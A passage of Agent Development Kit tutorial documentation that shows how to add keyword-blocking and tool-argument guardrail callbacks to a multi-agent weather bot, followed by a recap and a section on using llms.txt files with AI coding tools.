Define the before_model_callback Guardrail # Ensure necessary imports are available from google.adk.agents.callback_context import CallbackContext from google.adk.models.llm_request import LlmRequest from google.adk.models.llm_response import LlmResponse from google.genai import types # For creating response content from typing import Optional def block_keyword_guardrail( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: """ Inspects the latest user message for 'BLOCK'. If found, blocks the LLM call and returns a predefined LlmResponse. Otherwise, returns None to proceed. """ agent_name = callback_context.agent_name # Get the name of the agent whose model call is being intercepted print(f"--- Callback: block_keyword_guardrail running for agent: {agent_name} ---") # Extract the text from the latest user message in the request history last_user_message_text = "" if llm_request.contents: # Find the most recent message with role 'user' for content in reversed(llm_request.contents): if content.role == 'user' and content.parts: # Assuming text is in the first part for simplicity if content.parts[0].text: last_user_message_text = content.parts[0].text break # Found the last user message text print(f"--- Callback: Inspecting last user message: '{last_user_message_text[:100]}...' ---") # Log first 100 chars # --- Guardrail Logic --- keyword_to_block = "BLOCK" if keyword_to_block in last_user_message_text.upper(): # Case-insensitive check print(f"--- Callback: Found '{keyword_to_block}'. Blocking LLM call! 
---") # Optionally, set a flag in state to record the block event callback_context.state["guardrail_block_keyword_triggered"] = True print(f"--- Callback: Set state 'guardrail_block_keyword_triggered': True ---") # Construct and return an LlmResponse to stop the flow and send this back instead return LlmResponse( content=types.Content( role="model", # Mimic a response from the agent's perspective parts=[types.Part(text=f"I cannot process this request because it contains the blocked keyword '{keyword_to_block}'.")], ) # Note: You could also set an error_message field here if needed ) else: # Keyword not found, allow the request to proceed to the LLM print(f"--- Callback: Keyword not found. Allowing LLM call for {agent_name}. ---") return None # Returning None signals ADK to continue normally print("✅ block_keyword_guardrail function defined.") ``` ______________________________________________________________________ **2. Update Root Agent to Use the Callback** We redefine the root agent, adding the `before_model_callback` parameter and pointing it to our new guardrail function. We'll give it a new version name for clarity. *Important:* We need to redefine the sub-agents (`greeting_agent`, `farewell_agent`) and the stateful tool (`get_weather_stateful`) within this context if they are not already available from previous steps, ensuring the root agent definition has access to all its components. ```python # @title 2. Update Root Agent with before_model_callback # --- Redefine Sub-Agents (Ensures they exist in this context) --- greeting_agent = None try: # Use a defined model constant greeting_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="greeting_agent", # Keep original name for consistency instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting using the 'say_hello' tool. 
Do nothing else.", description="Handles simple greetings and hellos using the 'say_hello' tool.", tools=[say_hello], ) print(f"✅ Sub-Agent '{greeting_agent.name}' redefined.") except Exception as e: # greeting_agent is still None if Agent() raised, so report the model constant instead of greeting_agent.model print(f"❌ Could not redefine Greeting agent. Check Model/API Key ({MODEL_GEMINI_2_5_FLASH}). Error: {e}") farewell_agent = None try: # Use a defined model constant farewell_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="farewell_agent", # Keep original name instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message using the 'say_goodbye' tool. Do not perform any other actions.", description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.", tools=[say_goodbye], ) print(f"✅ Sub-Agent '{farewell_agent.name}' redefined.") except Exception as e: # farewell_agent is still None if Agent() raised, so report the model constant instead of farewell_agent.model print(f"❌ Could not redefine Farewell agent. Check Model/API Key ({MODEL_GEMINI_2_5_FLASH}). Error: {e}") # --- Define the Root Agent with the Callback --- root_agent_model_guardrail = None runner_root_model_guardrail = None # Check all components before proceeding if greeting_agent and farewell_agent and 'get_weather_stateful' in globals() and 'block_keyword_guardrail' in globals(): # Use a defined model constant root_agent_model = MODEL_GEMINI_2_5_FLASH root_agent_model_guardrail = Agent( name="weather_agent_v5_model_guardrail", # New version name for clarity model=root_agent_model, description="Main agent: Handles weather, delegates greetings/farewells, includes input keyword guardrail.", instruction="You are the main Weather Agent. Provide weather using 'get_weather_stateful'. " "Delegate simple greetings to 'greeting_agent' and farewells to 'farewell_agent'. 
" "Handle only weather requests, greetings, and farewells.", tools=[get_weather_stateful], sub_agents=[greeting_agent, farewell_agent], # Reference the redefined sub-agents output_key="last_weather_report", # Keep output_key from Step 4 before_model_callback=block_keyword_guardrail # <<< Assign the guardrail callback ) print(f"✅ Root Agent '{root_agent_model_guardrail.name}' created with before_model_callback.") # --- Create Runner for this Agent, Using SAME Stateful Session Service --- # Ensure session_service_stateful exists from Step 4 if 'session_service_stateful' in globals(): runner_root_model_guardrail = Runner( agent=root_agent_model_guardrail, app_name=APP_NAME, # Use consistent APP_NAME session_service=session_service_stateful # <<< Use the service from Step 4 ) print(f"✅ Runner created for guardrail agent '{runner_root_model_guardrail.agent.name}', using stateful session service.") else: print("❌ Cannot create runner. 'session_service_stateful' from Step 4 is missing.") else: print("❌ Cannot create root agent with model guardrail. One or more prerequisites are missing or failed initialization:") if not greeting_agent: print(" - Greeting Agent") if not farewell_agent: print(" - Farewell Agent") if 'get_weather_stateful' not in globals(): print(" - 'get_weather_stateful' tool") if 'block_keyword_guardrail' not in globals(): print(" - 'block_keyword_guardrail' callback") ``` ______________________________________________________________________ **3. Interact to Test the Guardrail** Let's test the guardrail's behavior. We'll use the *same session* (`SESSION_ID_STATEFUL`) as in Step 4 to show that state persists across these changes. 1. Send a normal weather request (should pass the guardrail and execute). 1. Send a request containing "BLOCK" (should be intercepted by the callback). 1. Send a greeting (should pass the root agent's guardrail, be delegated, and execute normally). ```python # @title 3. 
Interact to Test the Model Input Guardrail import asyncio # Ensure asyncio is imported # Ensure the runner for the guardrail agent is available if 'runner_root_model_guardrail' in globals() and runner_root_model_guardrail: # Define the main async function for the guardrail test conversation. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_guardrail_test_conversation(): print("\n--- Testing Model Input Guardrail ---") # Use the runner for the agent with the callback and the existing stateful session ID # Define a helper lambda for cleaner interaction calls interaction_func = lambda query: call_agent_async(query, runner_root_model_guardrail, USER_ID_STATEFUL, # Use existing user ID SESSION_ID_STATEFUL # Use existing session ID ) # 1. Normal request (Callback allows, should use Fahrenheit from previous state change) print("--- Turn 1: Requesting weather in London (expect allowed, Fahrenheit) ---") await interaction_func("What is the weather in London?") # 2. Request containing the blocked keyword (Callback intercepts) print("\n--- Turn 2: Requesting with blocked keyword (expect blocked) ---") await interaction_func("BLOCK the request for weather in Tokyo") # Callback should catch "BLOCK" # 3. Normal greeting (Callback allows root agent, delegation happens) print("\n--- Turn 3: Sending a greeting (expect allowed) ---") await interaction_func("Hello again") # --- Execute the `run_guardrail_test_conversation` async function --- # Choose ONE of the methods below based on your environment. # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. 
print("Attempting execution using 'await' (default for notebooks)...") await run_guardrail_test_conversation() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_guardrail_test_conversation()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_guardrail_test_conversation()) except Exception as e: print(f"An error occurred: {e}") """ # --- Inspect final session state after the conversation --- # This block runs after either execution method completes. # Optional: Check state for the trigger flag set by the callback print("\n--- Inspecting Final Session State (After Guardrail Test) ---") # Use the session service instance associated with this stateful session final_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id=USER_ID_STATEFUL, session_id=SESSION_ID_STATEFUL) if final_session: # Use .get() for safer access print(f"Guardrail Triggered Flag: {final_session.state.get('guardrail_block_keyword_triggered', 'Not Set (or False)')}") print(f"Last Weather Report: {final_session.state.get('last_weather_report', 'Not Set')}") # Should be London weather if successful print(f"Temperature Unit: {final_session.state.get('user_preference_temperature_unit', 'Not Set')}") # Should be Fahrenheit # print(f"Full State Dict: {final_session.state}") # For detailed view else: print("\n❌ Error: Could not retrieve final session state.") else: print("\n⚠️ Skipping model guardrail test. 
Runner ('runner_root_model_guardrail') is not available.") ``` ______________________________________________________________________ Observe the execution flow: 1. **London Weather:** The callback runs for `weather_agent_v5_model_guardrail`, inspects the message, prints "Keyword not found. Allowing LLM call for weather_agent_v5_model_guardrail.", and returns `None`. The agent proceeds, calls the `get_weather_stateful` tool (which uses the "Fahrenheit" preference from Step 4's state change), and returns the weather. This response updates `last_weather_report` via `output_key`. 1. **BLOCK Request:** The callback runs again for `weather_agent_v5_model_guardrail`, inspects the message, finds "BLOCK", prints "Blocking LLM call!", sets the state flag, and returns the predefined `LlmResponse`. The agent's underlying LLM is *never called* for this turn. The user sees the callback's blocking message. 1. **Hello Again:** The callback runs for `weather_agent_v5_model_guardrail` and allows the request. The root agent then delegates to `greeting_agent`. *Note: The `before_model_callback` defined on the root agent does NOT automatically apply to sub-agents.* The `greeting_agent` proceeds normally, calls its `say_hello` tool, and returns the greeting. You have successfully implemented an input safety layer! The `before_model_callback` provides a powerful mechanism to enforce rules and control agent behavior *before* expensive or potentially risky LLM calls are made. Next, we'll apply a similar concept to add guardrails around tool usage itself. ## Step 6: Adding Safety - Tool Argument Guardrail (`before_tool_callback`) In Step 5, we added a guardrail to inspect and potentially block user input *before* it reached the LLM. Now, we'll add another layer of control *after* the LLM has decided to use a tool but *before* that tool actually executes. This is useful for validating the *arguments* the LLM wants to pass to the tool. ADK provides the `before_tool_callback` for this precise purpose.
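The control point described here, between the model choosing a tool and the tool actually running, can be illustrated without ADK. The following is a minimal sketch in plain Python, not ADK's internal implementation: `fake_weather_tool`, `validate_city_args`, and `call_tool_with_hook` are hypothetical names invented for this illustration. It assumes only the general contract that a hook returning `None` lets the tool run, while a returned dictionary is used in place of the tool's result.

```python
from typing import Any, Callable, Dict, Optional

# Hypothetical type aliases for this sketch only (not ADK types).
ToolFn = Callable[..., Dict[str, Any]]
BeforeToolHook = Callable[[str, Dict[str, Any]], Optional[Dict[str, Any]]]


def fake_weather_tool(city: str) -> Dict[str, Any]:
    """Stand-in tool; a real tool would query a weather service."""
    return {"status": "success", "report": f"Sunny in {city}"}


def validate_city_args(tool_name: str, args: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Hypothetical hook: return a dict to block the call, or None to allow it."""
    city = str(args.get("city", "")).strip()
    if not city:
        # Block: this dictionary stands in for the tool's result.
        return {"status": "error", "error_message": "No city was provided."}
    # Modify: the in-place change is what the tool receives.
    args["city"] = city.title()
    return None


def call_tool_with_hook(
    tool_name: str, tool_fn: ToolFn, args: Dict[str, Any], hook: BeforeToolHook
) -> Dict[str, Any]:
    """Run the hook first; only call the tool if the hook returns None."""
    override = hook(tool_name, args)
    if override is not None:
        return override  # The tool function is skipped entirely.
    return tool_fn(**args)


allowed = call_tool_with_hook(
    "fake_weather_tool", fake_weather_tool, {"city": " london "}, validate_city_args
)
blocked = call_tool_with_hook(
    "fake_weather_tool", fake_weather_tool, {"city": ""}, validate_city_args
)
print(allowed)
print(blocked)
```

The first call reaches the tool with a normalized city name; the second never reaches it, because the hook's dictionary is returned instead.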
**What is `before_tool_callback`?** - It's a Python function executed just *before* a specific tool function runs, after the LLM has requested its use and decided on the arguments. - **Purpose:** Validate tool arguments, prevent tool execution based on specific inputs, modify arguments dynamically, or enforce resource usage policies. **Common Use Cases:** - **Argument Validation:** Check if arguments provided by the LLM are valid, within allowed ranges, or conform to expected formats. - **Resource Protection:** Prevent tools from being called with inputs that might be costly, access restricted data, or cause unwanted side effects (e.g., blocking API calls for certain parameters). - **Dynamic Argument Modification:** Adjust arguments based on session state or other contextual information before the tool runs. **How it Works:** 1. Define a function accepting `tool: BaseTool`, `args: Dict[str, Any]`, and `tool_context: ToolContext`. - `tool`: The tool object about to be called (inspect `tool.name`). - `args`: The dictionary of arguments the LLM generated for the tool. - `tool_context`: Provides access to session state (`tool_context.state`), agent info, etc. 1. Inside the function: - **Inspect:** Examine the `tool.name` and the `args` dictionary. - **Modify:** Change values within the `args` dictionary *directly*. If you return `None`, the tool runs with these modified args. - **Block/Override (Guardrail):** Return a **dictionary**. ADK treats this dictionary as the *result* of the tool call, completely *skipping* the execution of the original tool function. The dictionary should ideally match the expected return format of the tool it's blocking. - **Allow:** Return `None`. ADK proceeds to execute the actual tool function with the (potentially modified) arguments. **In this step, we will:** 1. Define a `before_tool_callback` function (`block_paris_tool_guardrail`) that specifically checks if the `get_weather_stateful` tool is called with the city "Paris". 1. 
If "Paris" is detected, the callback will block the tool and return a custom error dictionary. 1. Update our root agent (`weather_agent_v6_tool_guardrail`) to include *both* the `before_model_callback` and this new `before_tool_callback`. 1. Create a new runner for this agent, using the same stateful session service. 1. Test the flow by requesting weather for allowed cities and the blocked city ("Paris"). ______________________________________________________________________ **1. Define the Tool Guardrail Callback Function** This function targets the `get_weather_stateful` tool. It checks the `city` argument. If it's "Paris", it returns an error dictionary that looks like the tool's own error response. Otherwise, it allows the tool to run by returning `None`. ```python # @title 1. Define the before_tool_callback Guardrail # Ensure necessary imports are available from google.adk.tools.base_tool import BaseTool from google.adk.tools.tool_context import ToolContext from typing import Optional, Dict, Any # For type hints def block_paris_tool_guardrail( tool: BaseTool, args: Dict[str, Any], tool_context: ToolContext ) -> Optional[Dict]: """ Checks if 'get_weather_stateful' is called for 'Paris'. If so, blocks the tool execution and returns a specific error dictionary. Otherwise, allows the tool call to proceed by returning None. 
""" tool_name = tool.name agent_name = tool_context.agent_name # Agent attempting the tool call print(f"--- Callback: block_paris_tool_guardrail running for tool '{tool_name}' in agent '{agent_name}' ---") print(f"--- Callback: Inspecting args: {args} ---") # --- Guardrail Logic --- target_tool_name = "get_weather_stateful" # Match the function name used by FunctionTool blocked_city = "paris" # Check if it's the correct tool and the city argument matches the blocked city if tool_name == target_tool_name: city_argument = args.get("city", "") # Safely get the 'city' argument if city_argument and city_argument.lower() == blocked_city: print(f"--- Callback: Detected blocked city '{city_argument}'. Blocking tool execution! ---") # Optionally update state tool_context.state["guardrail_tool_block_triggered"] = True print(f"--- Callback: Set state 'guardrail_tool_block_triggered': True ---") # Return a dictionary matching the tool's expected output format for errors # This dictionary becomes the tool's result, skipping the actual tool run. return { "status": "error", "error_message": f"Policy restriction: Weather checks for '{city_argument.capitalize()}' are currently disabled by a tool guardrail." } else: print(f"--- Callback: City '{city_argument}' is allowed for tool '{tool_name}'. ---") else: print(f"--- Callback: Tool '{tool_name}' is not the target tool. Allowing. ---") # If the checks above didn't return a dictionary, allow the tool to execute print(f"--- Callback: Allowing tool '{tool_name}' to proceed. ---") return None # Returning None allows the actual tool function to run print("✅ block_paris_tool_guardrail function defined.") ``` ______________________________________________________________________ **2. Update Root Agent to Use Both Callbacks** We redefine the root agent again (`weather_agent_v6_tool_guardrail`), this time adding the `before_tool_callback` parameter alongside the `before_model_callback` from Step 5. 
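Before wiring the callback into an agent, it can help to exercise the guardrail logic on its own. The sketch below is one hedged way to do that without a model call or a runner. It makes two assumptions: `paris_guardrail_sketch` is a condensed, hypothetical stand-in for the Paris check (not the ADK-bound function itself), and the `SimpleNamespace` objects are fakes that expose only the attributes such a callback reads (`name`, `state`, `agent_name`), not real `BaseTool` or `ToolContext` instances.

```python
from types import SimpleNamespace
from typing import Any, Dict, Optional


def paris_guardrail_sketch(
    tool: Any, args: Dict[str, Any], tool_context: Any
) -> Optional[Dict[str, Any]]:
    """Condensed stand-in for the Paris check, written for offline testing."""
    is_target_tool = tool.name == "get_weather_stateful"
    is_blocked_city = str(args.get("city", "")).lower() == "paris"
    if is_target_tool and is_blocked_city:
        # Record the block in state, then short-circuit with an error result.
        tool_context.state["guardrail_tool_block_triggered"] = True
        return {
            "status": "error",
            "error_message": "Weather checks for 'Paris' are disabled.",
        }
    return None  # Allow the tool call to proceed.


# Fakes exposing only the attributes the callback reads.
fake_tool = SimpleNamespace(name="get_weather_stateful")
fake_context = SimpleNamespace(state={}, agent_name="test_agent")

# Allowed city: the callback returns None and leaves state untouched.
allowed_result = paris_guardrail_sketch(fake_tool, {"city": "London"}, fake_context)
state_after_allowed = dict(fake_context.state)

# Blocked city (case-insensitive): an error dict is returned and the flag is set.
blocked_result = paris_guardrail_sketch(fake_tool, {"city": "PARIS"}, fake_context)

# A different tool is never blocked, even with the same argument.
other_tool_result = paris_guardrail_sketch(
    SimpleNamespace(name="say_hello"), {"city": "Paris"}, fake_context
)

print(allowed_result)
print(blocked_result)
print(fake_context.state)
```

Checks like these cover the three branches (allowed city, blocked city, non-target tool) quickly, so the later agent run only needs to confirm the wiring.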
*Self-Contained Execution Note:* Similar to Step 5, ensure all prerequisites (sub-agents, tools, `before_model_callback`) are defined or available in the execution context before defining this agent. ```python # @title 2. Update Root Agent with BOTH Callbacks (Self-Contained) # --- Ensure Prerequisites are Defined --- # (Include or ensure execution of definitions for: Agent, LiteLlm, Runner, ToolContext, # MODEL constants, say_hello, say_goodbye, greeting_agent, farewell_agent, # get_weather_stateful, block_keyword_guardrail, block_paris_tool_guardrail) # --- Redefine Sub-Agents (Ensures they exist in this context) --- greeting_agent = None try: # Use a defined model constant greeting_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="greeting_agent", # Keep original name for consistency instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting using the 'say_hello' tool. Do nothing else.", description="Handles simple greetings and hellos using the 'say_hello' tool.", tools=[say_hello], ) print(f"✅ Sub-Agent '{greeting_agent.name}' redefined.") except Exception as e: # greeting_agent is still None if Agent() raised, so report the model constant instead of greeting_agent.model print(f"❌ Could not redefine Greeting agent. Check Model/API Key ({MODEL_GEMINI_2_5_FLASH}). Error: {e}") farewell_agent = None try: # Use a defined model constant farewell_agent = Agent( model=MODEL_GEMINI_2_5_FLASH, name="farewell_agent", # Keep original name instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message using the 'say_goodbye' tool. Do not perform any other actions.", description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.", tools=[say_goodbye], ) print(f"✅ Sub-Agent '{farewell_agent.name}' redefined.") except Exception as e: # farewell_agent is still None if Agent() raised, so report the model constant instead of farewell_agent.model print(f"❌ Could not redefine Farewell agent. Check Model/API Key ({MODEL_GEMINI_2_5_FLASH}). 
Error: {e}") # --- Define the Root Agent with Both Callbacks --- root_agent_tool_guardrail = None runner_root_tool_guardrail = None if ('greeting_agent' in globals() and greeting_agent and 'farewell_agent' in globals() and farewell_agent and 'get_weather_stateful' in globals() and 'block_keyword_guardrail' in globals() and 'block_paris_tool_guardrail' in globals()): root_agent_model = MODEL_GEMINI_2_5_FLASH root_agent_tool_guardrail = Agent( name="weather_agent_v6_tool_guardrail", # New version name model=root_agent_model, description="Main agent: Handles weather, delegates, includes input AND tool guardrails.", instruction="You are the main Weather Agent. Provide weather using 'get_weather_stateful'. " "Delegate greetings to 'greeting_agent' and farewells to 'farewell_agent'. " "Handle only weather, greetings, and farewells.", tools=[get_weather_stateful], sub_agents=[greeting_agent, farewell_agent], output_key="last_weather_report", before_model_callback=block_keyword_guardrail, # Keep model guardrail before_tool_callback=block_paris_tool_guardrail # <<< Add tool guardrail ) print(f"✅ Root Agent '{root_agent_tool_guardrail.name}' created with BOTH callbacks.") # --- Create Runner, Using SAME Stateful Session Service --- if 'session_service_stateful' in globals(): runner_root_tool_guardrail = Runner( agent=root_agent_tool_guardrail, app_name=APP_NAME, session_service=session_service_stateful # <<< Use the service from Step 4/5 ) print(f"✅ Runner created for tool guardrail agent '{runner_root_tool_guardrail.agent.name}', using stateful session service.") else: print("❌ Cannot create runner. 'session_service_stateful' from Step 4/5 is missing.") else: print("❌ Cannot create root agent with tool guardrail. Prerequisites missing.") ``` ______________________________________________________________________ **3. Interact to Test the Tool Guardrail** Let's test the interaction flow, again using the same stateful session (`SESSION_ID_STATEFUL`) from the previous steps. 1. 
Request weather for "New York": Passes both callbacks, tool executes (using Fahrenheit preference from state). 1. Request weather for "Paris": Passes `before_model_callback`. LLM decides to call `get_weather_stateful(city='Paris')`. `before_tool_callback` intercepts, blocks the tool, and returns the error dictionary. Agent relays this error. 1. Request weather for "London": Passes both callbacks, tool executes normally. ```python # @title 3. Interact to Test the Tool Argument Guardrail import asyncio # Ensure asyncio is imported # Ensure the runner for the tool guardrail agent is available if 'runner_root_tool_guardrail' in globals() and runner_root_tool_guardrail: # Define the main async function for the tool guardrail test conversation. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_tool_guardrail_test(): print("\n--- Testing Tool Argument Guardrail ('Paris' blocked) ---") # Use the runner for the agent with both callbacks and the existing stateful session # Define a helper lambda for cleaner interaction calls interaction_func = lambda query: call_agent_async(query, runner_root_tool_guardrail, USER_ID_STATEFUL, # Use existing user ID SESSION_ID_STATEFUL # Use existing session ID ) # 1. Allowed city (Should pass both callbacks, use Fahrenheit state) print("--- Turn 1: Requesting weather in New York (expect allowed) ---") await interaction_func("What's the weather in New York?") # 2. Blocked city (Should pass model callback, but be blocked by tool callback) print("\n--- Turn 2: Requesting weather in Paris (expect blocked by tool guardrail) ---") await interaction_func("How about Paris?") # Tool callback should intercept this # 3. 
Another allowed city (Should work normally again) print("\n--- Turn 3: Requesting weather in London (expect allowed) ---") await interaction_func("Tell me the weather in London.") # --- Execute the `run_tool_guardrail_test` async function --- # Choose ONE of the methods below based on your environment. # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. print("Attempting execution using 'await' (default for notebooks)...") await run_tool_guardrail_test() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_tool_guardrail_test()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_tool_guardrail_test()) except Exception as e: print(f"An error occurred: {e}") """ # --- Inspect final session state after the conversation --- # This block runs after either execution method completes. 
# Optional: Check state for the tool block trigger flag print("\n--- Inspecting Final Session State (After Tool Guardrail Test) ---") # Use the session service instance associated with this stateful session final_session = await session_service_stateful.get_session(app_name=APP_NAME, user_id=USER_ID_STATEFUL, session_id= SESSION_ID_STATEFUL) if final_session: # Use .get() for safer access print(f"Tool Guardrail Triggered Flag: {final_session.state.get('guardrail_tool_block_triggered', 'Not Set (or False)')}") print(f"Last Weather Report: {final_session.state.get('last_weather_report', 'Not Set')}") # Should be London weather if successful print(f"Temperature Unit: {final_session.state.get('user_preference_temperature_unit', 'Not Set')}") # Should be Fahrenheit # print(f"Full State Dict: {final_session.state}") # For detailed view else: print("\n❌ Error: Could not retrieve final session state.") else: print("\n⚠️ Skipping tool guardrail test. Runner ('runner_root_tool_guardrail') is not available.") ``` ______________________________________________________________________ Analyze the output: 1. **New York:** The `before_model_callback` allows the request. The LLM requests `get_weather_stateful`. The `before_tool_callback` runs, inspects the args (`{'city': 'New York'}`), sees it's not "Paris", prints "Allowing tool..." and returns `None`. The actual `get_weather_stateful` function executes, reads "Fahrenheit" from state, and returns the weather report. The agent relays this, and it gets saved via `output_key`. 1. **Paris:** The `before_model_callback` allows the request. The LLM requests `get_weather_stateful(city='Paris')`. The `before_tool_callback` runs, inspects the args, detects "Paris", prints "Blocking tool execution!", sets the state flag, and returns the error dictionary `{'status': 'error', 'error_message': 'Policy restriction...'}`. The actual `get_weather_stateful` function is **never executed**. 
The agent receives the error dictionary *as if it were the tool's output* and formulates a response based on that error message. 1. **London:** Behaves like New York, passing both callbacks and executing the tool successfully. The new London weather report overwrites the `last_weather_report` in the state. You've now added a crucial safety layer controlling not just *what* reaches the LLM, but also *how* the agent's tools can be used based on the specific arguments generated by the LLM. Callbacks like `before_model_callback` and `before_tool_callback` are essential for building robust, safe, and policy-compliant agent applications. ______________________________________________________________________ ## Conclusion: Your Agent Team is Ready! Congratulations! You've successfully journeyed from building a single, basic weather agent to constructing a sophisticated, multi-agent team using the Agent Development Kit (ADK). **Let's recap what you've accomplished:** - You started with a **fundamental agent** equipped with a single tool (`get_weather`). - You explored ADK's **multi-model flexibility** using LiteLLM, running the same core logic with different LLMs like Gemini, GPT-4o, and Claude. - You embraced **modularity** by creating specialized sub-agents (`greeting_agent`, `farewell_agent`) and enabling **automatic delegation** from a root agent. - You gave your agents **memory** using **Session State**, allowing them to remember user preferences (`temperature_unit`) and past interactions (`output_key`). - You implemented crucial **safety guardrails** using both `before_model_callback` (blocking specific input keywords) and `before_tool_callback` (blocking tool execution based on arguments like the city "Paris"). Through building this progressive Weather Bot team, you've gained hands-on experience with core ADK concepts essential for developing complex, intelligent applications. 
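The decision logic of the tool guardrail can also be written as a plain function, which makes it easy to unit test without running an agent. The following is a minimal sketch, not part of the tutorial code: the function name `check_city_guardrail` and its `blocked_cities` parameter are hypothetical, and a plain `dict` stands in for the session state. It mirrors the contract described above: return an error dictionary to block the tool call, or `None` to let it run.

```python
from typing import Any, Dict, Optional, Set


def check_city_guardrail(
    tool_name: str,
    args: Dict[str, Any],
    state: Dict[str, Any],
    target_tool: str = "get_weather_stateful",
    blocked_cities: Optional[Set[str]] = None,
) -> Optional[Dict[str, str]]:
    """Return an error dict to block the tool call, or None to allow it.

    Hypothetical helper: 'state' is any mutable mapping standing in for
    the session state used in the tutorial.
    """
    blocked = blocked_cities if blocked_cities is not None else {"paris"}

    # Only the target tool is subject to this policy.
    if tool_name != target_tool:
        return None

    city = str(args.get("city", "")).strip()
    if city.lower() in blocked:
        # Record that the guardrail fired, as the tutorial callback does.
        state["guardrail_tool_block_triggered"] = True
        return {
            "status": "error",
            "error_message": (
                f"Policy restriction: Weather checks for '{city.title()}' "
                "are currently disabled by a tool guardrail."
            ),
        }

    # No policy violation: the real tool may run.
    return None


if __name__ == "__main__":
    demo_state: Dict[str, Any] = {}
    print(check_city_guardrail("get_weather_stateful", {"city": "New York"}, demo_state))
    print(check_city_guardrail("get_weather_stateful", {"city": "Paris"}, demo_state))
    print(demo_state)
```

A `before_tool_callback` like the one in Step 6 could delegate to such a helper by passing `tool.name`, `args`, and `tool_context.state`, then returning the helper's result unchanged.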
**Key Takeaways:** - **Agents & Tools:** The fundamental building blocks for defining capabilities and reasoning. Clear instructions and docstrings are paramount. - **Runners & Session Services:** The engine and memory management system that orchestrate agent execution and maintain conversational context. - **Delegation:** Designing multi-agent teams allows for specialization, modularity, and better management of complex tasks. Agent `description` is key for auto-flow. - **Session State (`ToolContext`, `output_key`):** Essential for creating context-aware, personalized, and multi-turn conversational agents. - **Callbacks (`before_model`, `before_tool`):** Powerful hooks for implementing safety, validation, policy enforcement, and dynamic modifications *before* critical operations (LLM calls or tool execution). - **Flexibility (`LiteLlm`):** ADK empowers you to choose the best LLM for the job, balancing performance, cost, and features. **Where to Go Next?** Your Weather Bot team is a great starting point. Here are some ideas to further explore ADK and enhance your application: 1. **Real Weather API:** Replace the `mock_weather_db` in your `get_weather` tool with a call to a real weather API (like OpenWeatherMap, WeatherAPI). 1. **More Complex State:** Store more user preferences (e.g., preferred location, notification settings) or conversation summaries in the session state. 1. **Refine Delegation:** Experiment with different root agent instructions or sub-agent descriptions to fine-tune the delegation logic. Could you add a "forecast" agent? 1. **Advanced Callbacks:** - Use `after_model_callback` to potentially reformat or sanitize the LLM's response *after* it's generated. - Use `after_tool_callback` to process or log the results returned by a tool. - Implement `before_agent_callback` or `after_agent_callback` for agent-level entry/exit logic. 1. **Error Handling:** Improve how the agent handles tool errors or unexpected API responses. 
Maybe add retry logic within a tool. 1. **Persistent Session Storage:** Explore alternatives to `InMemorySessionService` for storing session state persistently (e.g., using databases like Firestore or Cloud SQL – requires custom implementation or future ADK integrations). 1. **Streaming UI:** Integrate your agent team with a web framework (like FastAPI, as shown in the ADK Streaming Quickstart) to create a real-time chat interface. The Agent Development Kit provides a robust foundation for building sophisticated LLM-powered applications. By mastering the concepts covered in this tutorial – tools, state, delegation, and callbacks – you are well-equipped to tackle increasingly complex agentic systems. Happy building! # Coding with AI The Agent Development Kit (ADK) documentation supports the [`/llms.txt` standard](https://llmstxt.org/), providing a machine-readable index of the documentation optimized for Large Language Models (LLMs). This allows you to easily use the ADK documentation as context in your AI-powered development environment. ## What is llms.txt? `llms.txt` is a standardized text file that acts as a map for LLMs, listing the most important documentation pages and their descriptions. This helps AI tools understand the structure of the ADK documentation and retrieve relevant information to answer your questions. The ADK documentation provides the following files that are automatically generated with every update: | File | Best For... 
| URL | | ------------------- | ------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------- | | **`llms.txt`** | Tools that can fetch links dynamically | [`https://google.github.io/adk-docs/llms.txt`](https://google.github.io/adk-docs/llms.txt) | | **`llms-full.txt`** | Tools that need a single, static text dump of the entire site | [`https://google.github.io/adk-docs/llms-full.txt`](https://google.github.io/adk-docs/llms-full.txt) | ## Usage in Development Tools You can use these files to power your AI coding assistants with ADK knowledge. This functionality allows your agents to autonomously search and read the ADK documentation while planning tasks and generating code. ### Gemini CLI The [Gemini CLI](https://geminicli.com/) can be configured to query the ADK documentation using the [ADK Docs Extension](https://github.com/derailed-dash/adk-docs-ext). **Installation:** To install the extension, run the following command: ```bash gemini extensions install https://github.com/derailed-dash/adk-docs-ext ``` **Usage:** Once installed, the extension is automatically enabled. You can ask questions about ADK directly in the Gemini CLI, and it will use the `llms.txt` file and ADK documentation to provide accurate answers and generate code. For example, you can ask the following question from within Gemini CLI: > How do I create a function tool using Agent Development Kit? ______________________________________________________________________ ### Antigravity The [Antigravity](https://antigravity.google/) IDE can be configured to access the ADK documentation by running a custom MCP server that points to the `llms.txt` file for ADK. **Prerequisites:** Ensure you have the 